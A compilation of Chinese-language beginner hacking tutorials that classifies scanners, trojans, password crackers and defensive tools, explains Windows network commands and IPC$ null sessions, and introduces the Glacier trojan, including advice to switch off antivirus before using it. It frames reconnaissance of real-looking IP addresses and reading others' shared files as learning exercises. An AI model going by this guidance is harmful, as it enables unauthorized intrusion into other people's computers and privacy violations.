扫描是黑客的眼睛，通过扫描程序，黑客可以找到攻击目标的IP地址、开放的端口号、服务器运行的版本、程序中可能存在的漏洞等。因而根据不同的扫描目的，扫描类软件又分为地址扫描器、端口扫描器、漏洞扫描器三个类别。在很多人看来，这些扫描器获得的信息大多数都是没有用处的，然而在黑客看来，扫描器好比黑客的眼睛，它可以让黑客清楚的了解目标，有经验的黑客则可以将目标“摸得一清二楚”，这对于攻击来说是至关重要的。同时扫描器也是网络管理员的得力助手，网络管理员可以通过它既是了解自己系统的运行状态和可能存在的漏洞，在黑客“下手”之前将系统中的隐患清除，保证服务器的安全稳定。

现在网络上很多扫描器在功能上都设计的非常强大，并且综合了各种扫描需要，将各种功能集成于一身。这对于初学网络安全的学习者来说无疑是个福音，因为只要学习者手中具备一款优秀的扫描器，就可以将信息收集工作轻松完成，免去了很多繁琐的工作。但是对于一个高级黑客来说，这些现成的工具是远远不能胜任的，他们使用的程序大多自己编写开发，这样在功能上将会完全符合个人意图，而且可以针对新漏洞既是对扫描器进行修改，在第一时间获得最宝贵的目标资料。本书此部分将会介绍扫描器的具体使用方法，而在第二部分中则会具体讲述如何开发这些扫描器，请读者务必循序渐进，否则将会给自己的学习带来很多不必要的烦恼。

二、远程监控类软件：

远程监控也叫做“木马”，这种程序实际上是在服务器上运行一个客户端软件，而在黑客的电脑中运行一个服务端软件，如此一来，服务器将会变成黑客的服务器的“手下”，也就是说黑客将会利用木马程序在服务器上开一个端口，通过这种特殊的木马功能对服务器进行监视、控制。因此，只要学习者掌握了某个木马的使用和操作方法，就可以轻易接管网络服务器或者其他上网者的电脑。

在控制了服务器之后，黑客的攻击行动也就接近尾声了，然而在做这件事情之前，黑客必须想办法让服务器运行自己木马的那个“客户端程序”，这就需要利用漏洞或者进行欺骗。欺骗最简单，就是想办法让操作服务器的人（系统管理员之类）运行黑客的客户端程序，而利用漏洞则要初学者阅读完本书后面的内容才能够做到了。

三、病毒和蠕虫：

首先声明一下：编写病毒的做法并不属于黑客。病毒只不过是一种可以隐藏、复制、传播自己的程序，这种程序通常具有破坏作用，虽然病毒可以对互联网造成威胁，然而它并没有试图寻找程序中的漏洞，所以制作病毒还有病毒本身对黑客的学习都没有实际意义。

之所以提到病毒，是因为蠕虫和病毒有很多相似性，如虫也是一段程序，和病毒一样具有隐藏、复制、船舶自己的功能。不同的是蠕虫程序通常会寻找特定的系统，利用其中的漏洞完成传播自己和破坏系统的作用，另外蠕虫程序可以将收到攻击的系统中的资料传送到黑客手中，这要看蠕虫设计者的意图，因而蠕虫是介于木马和病毒之间的一类程序。

计算机蠕虫是自包含的程序(或是一套程序)，它能传播它自身功能的拷贝或它的某些部分到其他的计算机系统中(通常是经过网络连接)。蠕虫的制造需要精深的网络知识，还要具备高超的编程水平，对于一个初学黑客的学习者来说，蠕虫的制造和使用都是非常难理解的，并且大多数蠕虫攻击的对象是Linux系统，而本书所使用的学习平台是Windows 95/98或Windows NT/2000，因而我同样建议初学者不要过多的涉及这部分内容，有关此部分内容也将会在《攻学兼防》的第二部分中有所介绍。

四、系统攻击和密码破解：

这类软件大多数都是由高级黑客编写出来的，供初级黑客使用的现成软件，软件本身不需要使用者具备太多的知识，使用者只要按照软件的说明操作就可以达到软件的预期目的，因而这类软件不具备学习黑客知识的功效。不过这类软件对于黑客很重要，因为它可以大幅度减小黑客的某些繁琐工作，使用者经过对软件的设置就可以让软件自动完成重复的工作，或者由软件完成大量的猜测工作，充分利用剩余时间继续学习网络知识。

系统攻击类软件主要分为信息炸弹和破坏炸弹。网络上常见的垃圾电子邮件就是这种软件的“杰作”，还有聊天室中经常看到的“踢人”、“骂人”类软件、论坛的垃圾灌水器、系统蓝屏炸弹也都属于此类软件的变异形式。如果学习者能够认真学习黑客知识，最终可以自己编写类似的工具，但如果某个人天天局限于应用此类软件上，他将永远是一个“伪黑客”。
密码破解类软件和上面的软件一样，完全依*它将对学习黑客毫无帮助。对于真正的黑客来说，这种软件可以帮助寻找系统登陆密码，相对于利用漏洞，暴力破解密码要简单许多，但是效率会非常低，但是真正的黑客无论是使用密码破解软件还是利用漏洞进入系统之后，都达到了自己入侵的目的，因此对于如何进入系统，对于某些溺爱系统攻击的黑客来说无关紧要。值得一提的是：真正执著于漏洞分析的黑客是从来不使用这种软件的，而我向来将分析漏洞作为至高无上的工作，所以也尽量不去接触此类软件。

五、监听类软件：

通过监听，黑客可以截获网络的信息包，之后对加密的信息包进行破解，进而分析包内的数据，获得有关系统的信息；也可能截获个人上网的信息包，分析的到上网账号、系统账号、电子邮件账号等个人隐私资料。监听类软件最大的特点在于它是一个亦正亦邪的，因为网络数据大多经过加密，所以用它来获得密码比较艰难，因而在更多的情况下，这类软件是提供给程序开发者或者网络管理员的，他们利用这类软件进行程序的调试或服务器的管理工作。

==================================================


五.常用黑客软件用途分类


一、防范：

这是从安全的角度出发涉及的一类软件，例如防火墙、查病毒软件、系统进程监视器、端口管理程序等都属于此类软件。这类软件可以在最大程度上保证电脑使用者的安全和个人隐私，不被黑客破坏。网络服务器对于此类软件的需要也是十分重视的，如日志分析软件、系统入侵软件等可以帮助管理员维护服务器并对入侵系统的黑客进行追踪。

二、信息搜集：

信息搜集软件种类比较多，包括端口扫描、漏洞扫描、弱口令扫描等扫描类软件；还有监听、截获信息包等间谍类软件，其大多数属于亦正亦邪的软件，也就是说无论正派黑客、邪派黑客、系统管理员还是一般的电脑使用者，都可以使用者类软件完成各自不同的目的。在大多数情况下，黑客使用者类软件的频率更高，因为他们需要依*此类软件对服务器进行全方位的扫描，获得尽可能多的关于服务器的信息，在对服务器有了充分的了解之后，才能进行黑客动作。

三、木马与蠕虫：

这是两种类型的软件，不过他们的工作原理大致相同，都具有病毒的隐藏性和破坏性，另外此类软件还可以由拥有控制权的人进行操作，或由事先精心设计的程序完成一定的工作。当然这类软件也可以被系统管理员利用，当作远程管理服务器的工具。

四、洪水：

所谓“洪水”即信息垃圾炸弹，通过大量的垃圾请求可以导致目标服务器负载超负荷而崩溃，近年来网络上又开始流行DOS分散式攻击，简单地说也可以将其归入此类软件中。洪水软件还可以用作邮件炸弹或者聊天式炸弹，这些都是经过简化并由网络安全爱好者程序化的“傻瓜式”软件，也就是本书一开始指责的“伪黑客”手中经常使用的软件。

五、密码破解：

网络安全得以保证的最实用方法是依*各种加密算法的密码系统，黑客也许可以很容易获得一份暗文密码文件，但是如果没有加密算法，它仍然无法获得真正的密码，因此使用密码破解类软件势在必行，利用电脑的高速计算能力，此类软件可以用密码字典或者穷举等方式还原经过加密的暗文。

六、欺骗：

如果希望获得上面提到的明文密码，黑客需要对暗文进行加密算法还原，但如果是一个复杂的密码，破解起来就不是那么简单了。但如果让知道密码的人直接告诉黑客密码的原型，是不是更加方便？欺骗类软件就是为了完成这个目的而设计的。

七、伪装：

网络上进行的各种操作都会被ISP、服务器记录下来，如果没有经过很好的伪装就进行黑客动作，很容易就会被反跟踪技术追查到黑客的所在，所以伪装自己的IP地址、身份是黑客非常重要的一节必修课，但是伪装技术需要高深的网络知识，一开始没有坚实的基础就要用到这一类软件了。



==================================================


学习黑客的基本环境


一、操作系统的选择：

我们经常听说黑客酷爱Linux系统，这是因为Linux相对Windows提供了更加灵活的操作方式，更加强大的功能。例如对于IP地址的伪造工作，利用Linux系统编写特殊的IP头信息可以轻松完成，然而在Windows系统下却几乎不可能做到。但是Linux也有它不足的一面，这个系统的命令庞杂、操作复杂，并不适合初学者使用，而且对于个人学习者，并没有过多的人会放弃“舒适”的Windows、放弃精彩的电脑游戏和便捷的操作方式，去全心投入黑客学习中。而且对于初学黑客的学习者来说，大多数网络知识都可以在Windows系统中学习，相对Linux系统，Windows平台下的黑客软件也并不在少数，另外通过安装程序包，Windows系统中也可以调试一定量的程序，因此初步学习黑客没有必要从Linux入手。

本书使用的平台WindowsME，因为对于个人用户来说，NT或者2000多少有些苛刻——系统配置要求太高；然而使用95或者98又缺少某些必要的功能——NET、TELNET命令不完善。但是本书的大部分内容测试漏洞，从远程服务器出发，所以也不是非要WindowsME操作系统进行学习，对于少数系统版本之间的差异，学习者可以和我联系获得相应系统的学习方法。

二、需要的常用软件：

除了基本的操作系统以外，学习者还需要安装各类扫描器，之后下载一个比较优秀的木马软件、一个监听类软件，除此以外别无它求。如果有必要，读者可以自行安装本文上述软件，然后学习其用法，但是我要告诉你，对于各类炸弹、还有网络上各式各样的黑客软件，在学习完本书后，你都可以自己制作、自己开发，根本没有必要使用他人编写的软件。
对于扫描器和监听软件，我给出以下建议，并且在本书的后面还会对这几个软件进行详细介绍：

扫描器：

监听软件：

木马：

三、额外的工具：

如果可以安装下面的工具，将会对学习黑客有莫大的帮助，当然下面的软件主要是学习额外内容并为“第二部分”学习作铺垫用的，所以没有也不会妨碍本书的学习。

1、后台服务器：

拥有某些网络应用的后台服务程序，可以将自己的电脑设置成一个小型服务器，用来学习相应的网络应用，从“内部”了解其运作机理，这将会大大提高自己对服务器的感性认识，同时还能够在激活服务器的时候；监测自己服务器上的数据，如果有其他黑客来攻击，则可以清晰的记录下对方的攻击过程，从而学习到更多的黑客攻击方法。对于本书而言，主要介绍网站的Perl和asp等脚本语言漏洞，所以可以安装一个IIS或者HTTPD。然后在安装ActivePerl，使自己的服务器具备编译cgi和pl脚本的能力。使用自己的服务器还有一个好处，可以节省大量的上网时间，将学习、寻找漏洞的过程放到自己的电脑上，既节省了金钱、有不会对网络构成威胁，一举两得。

2、C语言编译平台：

今后在学习黑客的路途中，将会遇到很多“属于自己的问题”，这些问题网络上的其他人可能不会注意，所以无法找到相应的程序，这个时候学习者就要自己动手开发有关的工具了，所以安装一个Borland C++将会非常便捷，通过这个编译器，学习者既可以学习C语言，也能够修改本书后面列出的一些小程序，打造一个属于自己的工具库。

四、网络安全软件分类

现在我们来了解一下有关网络安全软件的分类，因为学习黑客知识是两个相互联系的过程：既学习如何黑，还要学会如何防止被黑。

1、防火墙：

这是网络上最常见的安全机制软件，防火墙有硬件的、也有软件的，大多数读者看到的可能更多都是软件防火墙。其功能主要是过滤垃圾信息（保证系统不会受到炸弹攻击）、防止蠕虫入侵、防止黑客入侵、增加系统隐私性（对敏感数据进行保护）、实时监控系统资源，防止系统崩溃、定期维护数据库，备份主要信息……防火墙可以将系统本身的漏洞修补上，让黑客没有下手的机会。另外对于拥有局域网的企业来说，防火墙可以限制系统端口的开放，禁止某些网络服务（杜绝木马）。

2、检测软件：

互联网上有专门针对某个黑客程序进行清除的工具，但是这类软件更多是集成在杀毒软件或者防火墙软件内的，对于系统内的木马、蠕虫可以进行检测并清除，软件为了保护系统不受侵害，会自动保护硬盘数据、自动维护注册表文件、检测内容可以代码、监测系统端口开放状态等。如果用户需要，软件还可以编写有关的脚本对指定端口进行屏蔽（防火墙一样具备此功能）。

3、备份工具：

专门用来备份数据的工具可以帮助服务器定期备份数据，并在制定时间更新数据，这样即便黑客破坏了服务器上的数据库，软件也可以在短时间内完全修复收到入侵的数据。另外对于个人用户，这类软件可以对硬盘进行完全映像备份，一旦系统崩溃，用户利用这类软件可以将系统恢复到原始状态，例如Ghost就是这类软件中的佼佼者。

4、日志纪录、分析工具：

对于服务器来说，日志文件是必不可少的，管理员可以通过日志了解服务器的请求类型和请求来源，并且根据日志判断系统是否受到黑客攻击。通过日志分析软件，管理员可以轻松的对入侵黑客进行反追踪，找到黑客的攻击来源，进而抓不黑客。这也就是为什么黑客在攻击的时候多采用IP地址伪装、服务器跳转，并在入侵服务器之后清除日志文件的原因。

==================================================

网络流行黑客软件简介
（因主要教大家防御而不是攻击，因此暂时不提供相关的软件下载，需要研究的朋友可以去网络搜索。稍后将有软件的详细使用说明）

广陵寒

一、国产经典软件简介（先介绍写老软件，但其在国产黑客业内有举足轻重的作用。）

溯雪

密码探测器：利用溯雪可以轻松的完成基于web形式的各种密码猜测工作，例如email、forum中的注册用户密码等。软件采取多线程编写，除了支持字典和穷举以外，软件最大的特色是可以自己编写猜测规则，例如可以按照中文拼音或者英文单词拼写规则随机组合出字典文件，最大程度上保证了猜测的准确性。

乱刀

密码破解：乱刀可以破解unix系统中的密码暗文，对于取得了etc/passwd文件的黑客来说这是必不可少的。

天网

防火墙软件：中国第一套通过公安部认证的软硬件集成防火墙，能有效的防止黑客入侵，抵御来自外部网络的攻击，保证内部系统的资料不被盗取，它根据系统管理者设定的安全规则把守企业网络，提供强大的访问控制、身份认证、应用选通、网络地址转换、信息过滤、虚拟专网、流量控制、虚拟网桥等功能。

冰河

木马类软件：国内响当当的木马软件，知名度绝不亚于BO，主要用于远程监控。自动跟踪屏幕变化、记录各种口令信息、获取系统信息、限制系统功能、任意操作文件及注册表、远程关机、发送信息等多种监控功能。此软件的一大特色是可以由使用者自己设置需要占用的端口，如此一来监控类软件就很难从端口号上直接判断系统是否存在冰河了。

小分析家

监测类软件：免费网络协议分析工具，这个工具的特点是界面简单实用，与国外的一些sniffer产品相比，如Netxray，结果更为直观。此软件为免费版本，只能运行在NT系统下，同时编写此软件的公司还提供了软件的商业版本“网警”。

快速搜索

端口扫描器：快速搜索是一个在网络上搜索服务器的软件，可以根据给定的地址和端口号查找机器。具有多线程同时搜索技术，可以将搜索速度提高到单线程的十倍以上。
其他：针对2000/XP扫描的D-TOOLS等。

二、常见网络安全软件简介

Local Port Scanner

本地端口扫描器：通过这个软件可以监测本地电脑被打开的端口。此软件可以监测大多数黑客入侵或者木马占用的端口，它有五种不同的扫描方式并可以获得有关端口的详细扫描信息。

A-spy

系统进程察看器：A-spy可以监测Windows系统启动过程中调用的所有程序、执行的进程，并将结果保存在日志文件中。这个软件的用途是检察系统是否被安置了木马程序，同时软件还可以对系统启动需要调用的程序进行增加、删除和编辑等操作，改变调用程序之间的先后顺序，软件支持包括NT、2000在内的所有Windows平台，具有17种方式清楚木马程序。

Netmon

图形化Netstat命令：Netmon是图形化的Netstat命令，它运行在Windows系统中，可以察看系统的TCP、UDP连接状态，同时此软件提供了一份完整的木马、蠕虫占用端口清单，可以快速了解系统是否存在安全问题。

LANguard Network Scanner

局域网资料收集器：LANguard允许使用者扫描局域网内部的搜索电脑，搜集他们的netbios信息、打开端口、共享情况和其他相关资料，这些资料及可以被黑客利用进行攻击，也可以被管理员利用进行安全维护，通过它可以强行关闭指定端口和共享目录。

Leechsoft's NetMonitor

TCP/IP状态分析程序：这个软件使用于系统安全管理员、网络程序开发员、一般的拥护。此工具可以显示电脑在上网状态下存在的TCP/IP连接，同时还能分析是否有其他人正在监视上网者电脑中的某个端口，同时此工具内部还有一个功能强大的端口扫描程序。

Win Trinoo Server Sniper

清除Win.Trinoo Server程序：Win.Trinoo是一个类似DOS攻击的木马程序，被植入它的电脑将变成一台Win.Trinoo Server，黑客通过这个Server能够“借刀杀人”攻击其他电脑系统。Win Trinoo Server Sniper可以高速的监测电脑是否存在此问题。

SubSeven Server Sniper

清除SubSeven Server程序：同上面的工具一样，SubSeven也是一个木马程序，而SubSeven Server Sniper则是用来检测并清除SubSeven而设计的。不同的是，这个软件不但可以清楚SubSeven，而且还能搜集攻击者在您电脑中留下的蛛丝马迹，找到攻击者的ICQ号码、email地址等内容，从而为反跟踪提供了详尽的信息。

Attacker

端口监听程序：这是一个TCP/UDP端口监听程序，它可以常驻系统并在危险端口打开的时候发出警告信息，保证个人上网隐私的安全性。

ICEWatch

BlackICE插件：这个插件可以完善BlackICE的结果列表，让列表更加详尽，同时该插件还提供了更好的结果分类查询功能，并且可以对结果进行复制、编辑等操作。另外此插件为BlackICE提供了声音，可以设置软件使用过程中的提醒、警告的音效。

Isecure IP Scanner

netbios共享扫描器：黑客利用netbios的共享可以进入存在问题的电脑并对硬盘进行操作，同时还可以获得入侵电脑上的隐私资料。这个扫描器就是专门为防止此类事件发生开发的，运行软件会自动扫描目标并报告有关资料。

AnalogX Port Blocker

端口屏蔽程序：当使用者的电脑上开放某个端口的时候，任何人都可以通过其开放端口访问相应资源，而AnalogX Port Blocker可以屏蔽某个端口，或者设置特殊IP地址禁止对指定端口的请求，这从一定程度上方便了程序调试人员为在本地系统上从事软件的测试工作。

Tambu Dummy Server

端口屏蔽程序：这个工具同上面一个程序的功能是一样的，不过不同的是，这个工具是基于控制台模式，更加适合于高手。

Tambu Registry Edit

注册表修改程序：该程序可以让使用者手动修改系统注册表中的各项键值，从而改变系统的性能，同时软件中保存了网络上常见的具有破坏性程序的资料，可以迅速确定系统注册表中是否有可疑程序，并提供了清除和备份等功能。


==================================================


黑客必学的六条系统命令

这里我补充下，见笑了，呵呵，想学入侵，一定要知道cmd下的命令，如用ipc$入侵等，我发现有些人只知道黑客工具的使用，dos命令却一个都不知，其实适当的熟悉一些命令也无妨！

如：刚装完系统，打开了默认共享，现在用dos命令建立一个批处理删除默认共享。如下：
先打开cmd窗口，输入
copy con killshare.bat
net share c$ /del
net share d$ /del
net share e$ /del
net share admin$ /del
net share ipc$ /del (如果删除了这个共享，则局域网无法互相访问，请注意！)

以下是原文：-----------------------------------------------------------

一、ping命令

在Windows的控制窗口中（Windows 95/98/ME的command解释器、Windows NT/2000的cmd解释器），运行ping可以看到这个命令的说明，它是一个探测本地电脑和远程电脑之间信息传送速度的命令，这个命令需要TCP/IP协议的支持，ping将会计算一条信息从本地发送到远程再返回所需要的时间，黑客使用这个命令决定是否对服务器进行攻击，因为连接速度过慢会浪费时间、花费过多的上网费用。
另外这个命令还可以透过域名找到对方服务器的IP地址，我们知道域名只是提供给浏览网页用的，当我们看到一个不错的域名地址后，要想通过telnet连接它，就必须知道对方的IP地址，这里也要使用ping命令的。
这个命令的基本使用格式可以通过直接运行ping获得，现在假设目标是http://www.abc.com/，则可以在控制台下输入ping www.abc.com，经过等待会得到如下信息：
Pinging www.abc.com [204.202.136.32] with 32 bytes of data:
Reply from 204.202.136.32: bytes=32 time=302ms TTL=240
Reply from 204.202.136.32: bytes=32 time=357ms TTL=240
Reply from 204.202.136.32: bytes=32 time=288ms TTL=240
Reply from 204.202.136.32: bytes=32 time=274ms TTL=240
Ping statistics for 204.202.136.32:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 274ms, Maximum = 357ms, Average = 305ms
注意它的返回值来判断对方OS
这些信息的意思是：www.abc.com的IP地址是204.202.136.32，对他发送了四次数据包，数据包的大小是32字节，每一次返回的时间分别是302ms、357ms、288ms、274ms。综合看，发送了四个数据包全部返回，最小时间是274ms，最大时间357ms，他们的平均时间是305ms。
这样黑客就了解了连接对方服务器使用的时间。另外这个命令还有一些特殊的用法，例如可以通过IP地址反查服务器的NetBIOS名，现在以211.100.8.87为例，使用ping配合“-a”，在控制台下输入命令ping -a 211.100.8.87，它的返回结果是：
Pinging POPNET-FBZ9JDFV [211.100.8.87] with 32 bytes of data:
Reply from 211.100.8.87: bytes=32 time=96ms TTL=120
Reply from 211.100.8.87: bytes=32 time=110ms TTL=120
Reply from 211.100.8.87: bytes=32 time=110ms TTL=120
Reply from 211.100.8.87: bytes=32 time=109ms TTL=120
Ping statistics for 211.100.8.87:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 96ms, Maximum = 110ms, Average = 106ms
从这个结果会知道服务器的NetBIOS名称是POPNET-FBZ9JDFV。另外在一般情况下还可以通过ping对方让对方返回给你的TTL值大小，粗略的判断目标主机的系统类型是Windows系列还是UNIX/Linux系列，一般情况下Windows系列的系统返回的TTL值在100-130之间，而UNIX/Linux系列的系统返回的TTL值在240-255之间，例如上面的www.abc.com返回的TTL是240，对方的系统很可能是Linux，而第二个目标的TTL是120，那么说明它使用的系统也许是Windows。
另外ping还有很多灵活的应用，我不在这里过多的介绍，读者请另行查阅此命令相关帮助文件。

二、net命令：

NET命令是很多网络命令的集合，在Windows ME/NT/2000内，很多网络功能都是以net命令为开始的，通过net help可以看到这些命令的详细介绍：
NET CONFIG 显示系统网络设置
NET DIAG 运行MS的DIAGNOSTICS程序显示网络的DIAGNOSTIC信息
NET HELP 显示帮助信息
NET INIT 不通过绑定来加载协议或网卡驱动
NET LOGOFF 断开连接的共享资源
NET LOGON 在WORKGROUP中登陆
NET PASSWORD 改变系统登陆密码
NET PRINT 显示或控制打印作业及打印队列
NET START 启动服务，或显示已启动服务的列表
NET STOP 停止网络服务
NET TIME 使计算机的时钟与另一台计算机或域的时间同步
NET USE 连接计算机或断开计算机与共享资源的连接，或显示计算机的连接信息
NET VER 显示局域网内正在使用的网络连接类型和信息
NET VIEW 显示域列表、计算机列表或指定计算机的共享资源列表
这些命令在Win95/98中支持的比较少，只有几个基本常见的，而在NT或者2000中又元元多于上面的介绍，不过大多数对于初学者也没有必要掌握，所以我选择了WindowsME进行介绍，其中最常用到的是NET VIEW和NET USE，通过者两个命令，学习者可以连接网络上开放了远程共享的系统，并且获得资料。这种远程共享本来是为便捷操作设计的，但是很多网络管理员忽视了它的安全性，所以造成了很多不应该共享的信息的暴露，对于学习者来说，则可以轻易获得它人电脑上的隐私资料。
例如在控制台下输入net view \\202.96.50.24则可以获得对应IP的系统共享目录，进而找到他们的共享文件，当然这需要202.96.50.24系统的确存在共享目录，具体如何找到这些存在共享的系统，我将会在后面的文章中进行介绍。

三、telnet和ftp命令：

这两个命令分别可以远程对系统进行telnet登陆和ftp登陆，两种登陆使用的不同的协议，分别属于两种不同的网络服务，ftp是远程文件共享服务，也就是说学习者可以将自己的资料上传、下载，但是它并没有过多的权利，无法在远程电脑上执行上传的文件；而telnet则属于远程登陆服务，也就是说可以登陆到远程系统上，并获得一个解释器权限，拥有解释器就意味着拥有了一定的权限，这种权限可能是基本的文件操作、也可能是可以控制系统的管理员权限。

==================================================

四、netstat命令：

这个程序有助于我们了解网络的整体使用情况。它可以显示当前正在活动的网络连接的详细信息，如采用的协议类型、当前主机与远端相连主机（一个或多个）的IP地址以及它们之间的连接状态等。 使用netstat ？可以显示它的命令格式和参数说明：
netstat [-a] [-e] [-n] [-s] [-p proto] [-r] [interval] 其中的参数说明如下：
-a 显示所有主机的端口号；
-e 显示以太网统计信息；
-n 以数字表格形式显示地址和端口；
-p proto 显示特定的协议的具体使用信息；
-r 显示本机路由表的内容；
-s 显示每个协议的使用状态（包括TCP、UDP、IP）；
interval 重新显示所选的状态，每次显示之间的间隔数（单位秒）。
netstat命令的主要用途是检测本地系统开放的端口，这样做可以了解自己的系统开放了什么服务、还可以初步推断系统是否存在木马，因为常见的网络服务开放的默认端口轻易不会被木马占用，例如：用于FTP（文件传输协议）的端口是21；用于TELNET（远程登录协议）的端口是23；用于SMTP（邮件传输协议）的端口是25；用于DNS（域名服务，即域名与IP之间的转换）的端口是53；用于HTTP（超文本传输协议）的端口是80；用于POP3（电子邮件的一种接收协议）的端口是110；WINDOWS中开放的端口是139，除此以外，如果系统中还有其他陌生的到口，就可能是木马程序使用的了。通过netstat或者netstat -a可以观察开放的端口，如果发现下面的端口，就说明已经有木马程序在系统中存在：
31337号端口是BackOffice木马的默认端口；1999是Yai木马程序；2140或者3150都是DEEP THROAT木马使用的端口；还有NETBUS、冰河或者SUB7等木马程序都可以自定义端口，因此发现了陌生端口一定要提高警惕，使用防火墙或者查病毒软件进行检测。

广陵寒

五、tracert命令：

这个命令的功能是判定数据包到达目的主机所经过的路径、显示数据包经过的中继节点清单和到达时间。tracert命令的格式如下：
tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name
命令行中的参数-d是要求tracert不对主机名进行解析，-h是指定搜索到目的地址的最大轮数，-j的功能是沿着主机列表释放源路由，-w用来设置超时时间间隔。
通过tracert可以判断一个服务器是属于国内还是国际（网络服务器的物理未知不能依*域名进行判断），根据路由路经可以判断信息从自己的系统发送到网络上，先后经过了哪些IP到大对方服务器，这就好像乘公共汽车的时候从起点出发到达终点站的时候，中途会出现很多路牌一个道理，我们清楚了自己的信息的传送路径，才能够更清晰的了解网络、对服务器进行攻击。

六、winipcfg：

winipcfg和ipconfig都是用来显示主机内IP协议的配置信息。只是winipcfg适用于Windows 95/98，而ipconfig适用于Windows NT。winipcfg不使用参数，直接运行它，它就会采用Windows窗口的形式显示具体信息。这些信息包括：网络适配器的物理地址、主机的IP地址、子网掩码以及默认网关等，点击其中的“其他信息”，还可以查看主机的相关信息如：主机名、DNS服务器、节点类型等。其中网络适配器的物理地址在检测网络错误时非常有用。
ipconfig的命令格式如下：ipconfig [/? | /all | /release [adapter] | /renew [adapter]]
其中的参数说明如下：
使用不带参数的ipconfig命令可以得到以下信息：IP地址、子网掩码、默认网关。而使用ipconfig
/? 显示ipconfig的格式和参数的英文说明；
/all 显示所有的配置信息；
/release 为指定的适配器（或全部适配器）释放IP地址（只适用于DHCP）；
/renew 为指定的适配器（或全部适配器）更新IP地址（只适用于DHCP）。
/all，则可以得到更多的信息：主机名、DNS服务器、节点类型、网络适配器的物理地址、主机的IP地址、子网掩码以及默认网关等。

==================================================


ipc$入侵与防范

一 前言

网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄。

不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑。

二 什么是ipc$

IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的)，它是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。

利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的)，而利用这个空的连接，连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。

我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$......)和系统目录winnt或windows(admin$)。

所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$，访问共享资源,导出用户列表,并使用一些字典工具，进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的。

解惑:

1)IPC连接是Windows NT及以上系统中特有的远程网络登陆功能，其功能相当于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函数，所以不能在Windows 9.x中运行。

也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的(但有些朋友说在98下能建立空的连接,不知道是真是假,不过现在都2003年了,建议98的同志换一下系统吧,98不爽的)

2)即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接
3)并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表

三 建立ipc$连接在hack攻击中的作用

就像上面所说的,即使你建立了一个空的连接,你也可以


<待续......>

广陵寒

木马工具详解+入门工具使用

现在我们来看看木马在黑客学习中的作用。首先学习者要明确木马究竟是什么，同时还要搞清楚木马的类型，并且学习一些流行的木马程序的用法，这是一个相辅相成的学习进程，当黑客利用漏洞进入服务器之后，就可以选择两条路：一、破坏系统、获得资料、显示自己；二、利用木马为自己开辟一个合法的登录账号、掌管系统、利用被入侵系统作为跳板继续攻击其他系统。

由此看来，木马程序是为第二种情况涉及的一种可以远程控制系统的程序，根据实现木马程序的目的，可以知道这种程序应该具有以下性质：

1、伪装性：程序将自己的服务端伪装成合法程序，并且具有诱惑力的让被攻击者执行，在程序被激活后，木马代码会在未经授权的情况下运行并装载到系统开始运行进程中；

2、隐藏性：木马程序通病毒程序一样，不会暴露在系统进程管理器内，也不会让使用者察觉到木马的存在，它的所有动作都是伴随其他程序的运行进行的，因此在一般情况下使用者很难发现系统中木马的存在；

3、破坏性：通过远程控制，黑客可以通过木马程序对系统中的文件进行删除、编辑操作，还可以进行诸如格式化硬盘、改变系统启动参数等恶性破坏操作；

4、窃密性：木马程序最大的特点就是可以窥视被入侵电脑上的所有资料，这不仅包括硬盘上的文件，还包括显示器画面、使用者在操作电脑过程中在硬盘上输入的所有命令等。

看了上面的介绍，学习者应该对木马程序的用途有了一个初步了解，并且区分清除木马程序和病毒之间的相同点和不同点，由于黑客手段的日益增多，许多新出现的黑客手段（例如 D.O.S）经常会让学习者思维混乱，但实际上这些新出现的黑客手段都是从最开始的溢出、木马演变出来的，因而对于初学者来说，并不需要急于接触过多的新技术，而是要对最基本的也是最有效的黑客技术进行深入学习。

一、木马的原理：

大多数木马程序的基本原理都是一样的，他们是由两个程序配合使用——被安装在入侵系统内的Server程序；另一个是对Server其控制作用的Client程序。学习者已经了解了木马和病毒的区别，大多数Server程序不会像病毒一样主动传播，而是潜伏在一些合法程序内部，然后由目标操作者亲手将其安装到系统中，虽然这一切都是没有经过目标操作者授权的，然而从某种程度上说，这的确是在经过诱惑后目标“心甘情愿”接收木马的，当Server安装成功后，黑客就可以通过Client控制程序对Server端进行各种操作了。

木马程序的Server端为了隐藏自己，必须在设计中做到不让自己显示到任务栏或者系统进程控制器中，同时还不会影响其他程序的正常运行，当使用者电脑处于断线状态下，Server段不会发送任何信息到预设的端口上，而会自动检测网络状态直到网络连接好，Server会通过email或者其他形式将Server端系统资料通知Client端，同时接收Client发送出来的请求。

二.木马实战：

先说国产木马老大，冰河-----你不得不了解的工具。

（编者残语：）说到冰河，也许在2005年的今天显得很落后，但冰河创造了一个时代，一个人人能做黑客的时代。使用方便简单，人人都能上手。图形界面，中文菜单，了解木马，先从了解远程控制软件冰河开始。

======================================================

使用冰河前，请注意：如果你的机器有杀毒软件，可能会出现病毒提示。说实话，他还真是一个病毒。呵呵。所以在使用前，请慎重考虑，出了问题，小编可担当不起。建议使用不管是客户端还是服务端都请关闭杀毒软件以达到更好的使用效果。

======================================================

软件功能概述:

